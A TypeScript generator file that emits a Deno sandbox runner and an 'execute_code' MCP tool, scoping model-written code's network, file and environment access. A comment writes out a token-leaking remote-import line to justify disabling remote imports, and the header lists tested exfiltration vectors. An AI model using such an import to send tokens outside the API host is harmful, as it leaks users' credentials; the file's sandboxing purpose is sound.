// packages/cli/src/emit/emit-sandbox.ts
//
// Emits the `execute_code` MCP tool (MCPFO-30) for SDK code mode
// (ARCHITECTURE.md sections 43/44): a single tool that runs model-written
// TypeScript against the typed client (emit-client.ts, MCPFO-29) inside a
// sandboxed Deno subprocess, instead of one MCP tool per operation.
//
// Design validated against a real local proof-of-concept before writing this
// file (Deno 2.9.6, confirmed via `deno run`): `--allow-net=<api-host-only>`,
// `--allow-read=<generated-project-dist-dir-only>`, a minimal `--allow-env`
// allowlist (KLARIDIAN_BASE_URL + KLARIDIAN_AUTH_TOKEN — the exact two vars
// client.ts reads), and no `--allow-write` at all block every exfiltration
// vector tried (cross-host fetch, arbitrary file write, arbitrary file read)
// while the legitimate call path (import the generated client, call an
// operation, get real data back) works unmodified. Model code is piped over
// stdin as a Deno program (`deno run - `) with cwd set to the compiled
// client's directory, so relative `import { x } from "./client.js"` resolves
// without writing a temp file to disk per invocation.

import { typescriptPluginDispatch } from "./plugin-dispatch/typescript.js";
import { API_CALL_MARKER, API_CALLS_META_KEY } from "./emit-client.js";

/** execute_code's hints; derive them with codeModeAnnotations(tools) (emit-tool.ts). */
export interface ExecuteCodeAnnotations {
  readOnlyHint: boolean;
  destructiveHint: boolean;
  idempotentHint: boolean;
  openWorldHint: boolean;
}
/** Used only when no operation set is known: the MCP spec defaults (may modify, may destroy). */
export const CONSERVATIVE_EXECUTE_CODE_ANNOTATIONS: ExecuteCodeAnnotations = {
  readOnlyHint: false,
  destructiveHint: true,
  idempotentHint: false,
  openWorldHint: true,
};

/**
 * Extracts the `host` or `host:port` portion from an absolute base URL, in
 * the shape Deno's `--allow-net` expects (no scheme, no path). Throws if the
 * URL isn't absolute — code mode requires a concrete API host to scope the
 * sandbox's network permission to; an unresolved/relative base URL (see
 * `resolveBaseUrlWarning` in emit-server.ts) can't be sandboxed safely.
 */
export function extractApiHost(baseUrl: string): string {
  let parsed: URL;
  try {
    parsed = new URL(baseUrl);
  } catch {
    throw new Error(`Cannot derive a sandbox network permission from base URL "${baseUrl}" — it is not a valid absolute URL.`);
  }
  return parsed.port ? `${parsed.hostname}:${parsed.port}` : parsed.hostname;
}

/**
 * Deno permission flags for the execute_code sandbox. Kept as a small pure
 * function (not inlined at the call site) so MCPFO-30's real spawn wiring
 * and this file's tests exercise identical flag-construction logic.
 *
 * `apiHost` should be `host` or `host:port` (no scheme) — Deno's `--allow-net`
 * matches on that shape. `distDir` is the absolute path to the generated
 * project's compiled output directory (where client.js lives); read access
 * is scoped to exactly that directory, never the whole filesystem.
 */
export function buildDenoPermissionFlags(opts: { apiHost: string; distDir: string }): string[] {
  return [
    `--allow-net=${opts.apiHost}`,
    `--allow-read=${opts.distDir}`,
    // The generated client (client.ts, MCPFO-29) reads exactly these two
    // env vars and no others — see emit-client.ts's emitFunctionBody. Any
    // third-party secret in the parent process's environment stays
    // invisible to model-written code even if it tries `Deno.env.toObject()`.
    `--allow-env=KLARIDIAN_BASE_URL,KLARIDIAN_AUTH_TOKEN`,
    // --allow-net does not govern module imports: Deno allows remote imports
    // from a default host list (deno.land, jsr.io, esm.sh, cdn.jsdelivr.net,
    // ...) regardless. That is an egress channel outside the API host (a
    // query string on an import URL), so remote imports are disabled.
    `--no-remote`,
    // Deliberately no --allow-write, no --allow-run, no --allow-ffi, no
    // --allow-sys: model-written code has no legitimate need for any of
    // them, and omitting them is the actual sandboxing (Deno denies by
    // default; only what's explicitly listed here is reachable).
  ];
}

/**
 * Emits `src/sandbox-runner.ts` — the generated project's own wrapper around
 * `deno run`, invoked by the execute_code MCP tool handler. Kept as a
 * separate vendored file (not inlined string-building in the tool handler)
 * so it can itself be unit- and integration-tested independently, and so a
 * generated project's author can read exactly what runs model code, per the
 * project's "fail loudly, don't guess" + auditability principles (section 7).
 */
export function emitSandboxRunner(): string {
  return `// Generated by klaridian — SDK code mode sandbox runner (MCPFO-30).
// Spawns a Deno subprocess with a minimal, explicit permission set to run
// model-written TypeScript against the typed API client (./client.js).
// Deno is required at runtime; it is NOT vendored (a separate binary, not
// source) — see ARCHITECTURE.md section 43 point 3 for why this is an
// accepted, documented deviation from the project's vendored-source rule.
// Do not edit directly; regenerate with \\\`klaridian generate\\\`.

import { spawn } from "node:child_process";
import { fileURLToPath } from "node:url";
import path from "node:path";

const __dirname = path.dirname(fileURLToPath(import.meta.url));

// Per-run limits, overridable by env (same names as the Python target).
const TIMEOUT_MS = Number(process.env.KLARIDIAN_SANDBOX_TIMEOUT ?? "30") * 1000;
const MAX_HEAP_MB = Number(process.env.KLARIDIAN_SANDBOX_MAX_HEAP_MB ?? "256");

/** One upstream API call made by the script through the typed client (MCPFO-134). */
export interface ApiCallRecord {
  operation: string;
  method: string;
  path: string;
  host: string;
  status: number;
  started_at: number;
  duration_ms: number;
}

export interface SandboxResult {
  ok: boolean;
  stdout: string;
  stderr: string;
  /** Upstream calls the script made, in order (at most MAX_API_CALLS). */
  apiCalls: ApiCallRecord[];
}

const API_CALL_MARKER = ${JSON.stringify(API_CALL_MARKER)};
const MAX_API_CALLS = 1000;

/**
 * Splits the typed client's per-call marker lines out of the script's stderr.
 * A script could print a fake marker line itself; that only affects its own
 * call's telemetry, never the sandbox boundary.
 */
function splitApiCalls(stderr: string): { stderr: string; apiCalls: ApiCallRecord[] } {
  const apiCalls: ApiCallRecord[] = [];
  const rest: string[] = [];
  for (const line of stderr.split("\\n")) {
    if (line.startsWith(API_CALL_MARKER)) {
      if (apiCalls.length < MAX_API_CALLS) {
        try { apiCalls.push(JSON.parse(line.slice(API_CALL_MARKER.length))); } catch { /* malformed: drop */ }
      }
    } else {
      rest.push(line);
    }
  }
  return { stderr: rest.join("\\n"), apiCalls };
}

/**
 * Runs \\\`code\\\` (a TypeScript/JavaScript module body written by the model,
 * expected to \\\`import\\\` from "./client.js" and \\\`console.log\\\` its result) in
 * an isolated Deno subprocess. Read access is scoped to this file's own
 * directory (where the compiled client lives); network access is scoped to
 * the configured API host only; only the two env vars the client actually
 * needs are passed through. Returns captured stdout/stderr rather than
 * throwing, so the MCP tool handler can report execution failures back to
 * the model as a normal (non-protocol-error) tool result.
 */
export async function runInSandbox(code: string, apiHost: string): Promise<SandboxResult> {
  return new Promise((resolve) => {
    const args = [
      "run",
      \`--allow-net=\${apiHost}\`,
      \`--allow-read=\${__dirname}\`,
      "--allow-env=KLARIDIAN_BASE_URL,KLARIDIAN_AUTH_TOKEN",
      // No remote module imports. Deno's default import allow-list (deno.land,
      // jsr.io, esm.sh, cdn.jsdelivr.net, ...) is NOT covered by --allow-net,
      // so without this, model code could \\\`await import("https://<cdn>/?x=<token>")\\\`
      // and leak data outside the API host. Only local modules may load.
      "--no-remote",
      // Per-run heap cap so one script can't exhaust the server's memory.
      \`--v8-flags=--max-old-space-size=\${MAX_HEAP_MB}\`,
      "-", // read the program from stdin
    ];
    const child = spawn("deno", args, {
      cwd: __dirname,
      env: {
        // PATH is required so the OS can locate the "deno" binary at all —
        // spawn() does not fall back to the parent's PATH when a partial
        // env object is supplied. Only PATH plus the two vars the client
        // reads are passed through; nothing else from this process's
        // environment (secrets, other API keys, etc.) reaches the sandbox.
        PATH: process.env.PATH ?? "",
        KLARIDIAN_BASE_URL: process.env.KLARIDIAN_BASE_URL ?? "",
        KLARIDIAN_AUTH_TOKEN: process.env.KLARIDIAN_AUTH_TOKEN ?? "",
      },
      stdio: ["pipe", "pipe", "pipe"],
    });

    let stdout = "";
    let stderr = "";
    let timedOut = false;
    child.stdout.on("data", (c: Buffer) => { stdout += c.toString("utf-8"); });
    child.stderr.on("data", (c: Buffer) => { stderr += c.toString("utf-8"); });
    child.on("error", (err) => {
      // Deno binary not found, or failed to spawn at all.
      resolve({ ok: false, stdout, stderr: stderr + \`\\\\nSandbox spawn error: \${err.message}\`, apiCalls: [] });
    });
    // Wall-clock limit: a hung script (e.g. an infinite loop) is killed.
    const timer = setTimeout(() => {
      timedOut = true;
      child.kill("SIGKILL");
    }, TIMEOUT_MS);
    child.on("close", (exitCode) => {
      clearTimeout(timer);
      const split = splitApiCalls(stderr);
      if (timedOut) {
        resolve({ ok: false, stdout, stderr: split.stderr + \`Execution timed out after \${TIMEOUT_MS / 1000}s.\`, apiCalls: split.apiCalls });
        return;
      }
      resolve({ ok: exitCode === 0, stdout, stderr: split.stderr, apiCalls: split.apiCalls });
    });

    child.stdin.write(code);
    child.stdin.end();
  });
}
`;
}

/**
 * Emits the `execute_code` MCP tool registration block, matching the same
 * `server.registerTool(...)` shape emit-tool.ts already uses for 1:1 tools
 * — SDK code mode replaces N per-operation tool blocks with exactly this one.
 *
 * `wrap`, when provided (MCPFO-32), applies a plugin's tool-handler wrap
 * function exactly the way emit-tool.ts's `emitToolBlock` already does for
 * the "tools" architecture — see this file's header comment and
 * ARCHITECTURE.md section 48 for the honest scope of what this instruments
 * (execute_code invocation-level: was it called, how long, did it error —
 * NOT per-individual-API-call granularity inside the sandboxed script,
 * which runs in an isolated Deno subprocess with no access to the parent
 * process's OTel/PostHog SDK instances).
 */
export function emitExecuteCodeToolBlock(
  apiHost: string,
  wrap?: { fn: string },
  annotations: ExecuteCodeAnnotations = CONSERVATIVE_EXECUTE_CODE_ANNOTATIONS
): string {
  const wiring = wrap ? { importStatement: "", wrapFunctionName: wrap.fn } : undefined;
  const handlerOpen = typescriptPluginDispatch.wrapHandlerOpen("execute_code", wiring);
  const handlerClose = typescriptPluginDispatch.wrapHandlerClose(wiring);
  return `  server.registerTool(
    "execute_code",
    {
      title: "Execute Code",
      description:
        "Runs TypeScript code against the generated, typed API client (import from \\"./client.js\\"). " +
        "Code runs in an isolated sandbox with network access restricted to the API host only " +
        "(${apiHost}) and no filesystem write access. console.log(...) output is returned as the result.",
      inputSchema: z.object({ code: z.string().describe("TypeScript module body. Import functions from \\"./client.js\\" and console.log(...) the result.") }),
      annotations: { title: "Execute Code", readOnlyHint: ${annotations.readOnlyHint}, destructiveHint: ${annotations.destructiveHint}, idempotentHint: ${annotations.idempotentHint}, openWorldHint: ${annotations.openWorldHint} },
    },
    ${handlerOpen}
      const { runInSandbox } = await import("./sandbox-runner.js");
      const result = await runInSandbox((args as { code: string }).code, ${JSON.stringify(apiHost)});
      const text = result.stdout + (result.stderr ? \`\\nstderr:\\n\${result.stderr}\` : "");
      // MCPFO-134: the upstream calls the script made ride in the result _meta,
      // so a plugin wrapping this handler can record one child span / event
      // per API operation. MCP clients ignore _meta keys they don't know.
      return {
        content: [{ type: "text" as const, text: text || "(no output)" }],
        isError: !result.ok,
        ...(result.apiCalls.length ? { _meta: { ${JSON.stringify(API_CALLS_META_KEY)}: result.apiCalls } } : {}),
      };
${handlerClose},
  );`;
}
